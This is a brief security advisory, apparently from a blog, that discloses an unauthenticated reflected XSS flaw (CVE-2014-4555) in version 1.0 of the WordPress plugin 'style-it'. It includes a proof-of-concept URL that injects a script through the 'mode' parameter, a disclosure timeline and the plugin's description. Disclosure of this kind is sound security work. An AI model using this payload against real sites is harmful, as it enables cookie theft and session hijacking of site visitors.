wp-plugin : style-it – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : style-it

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/styleit/fonts/font-form.php?mode=mode%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-22

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4555

 
Plugin Description :
 
This plugin enables you to manage background and fonts of almost every item in your wordpress blog. This plugin by default supports google fonts and cufon js fonts.

Style It also features a powerful editor where you can change various settings like background-image, background-url, color, etc.

This plugin is very easy to optimize for any blog.

 [Style It Homepage](http://www.unizoe.com/products/style-it-wp/ "Plugin homepage")

Leave a Reply

Your email address will not be published. Required fields are marked *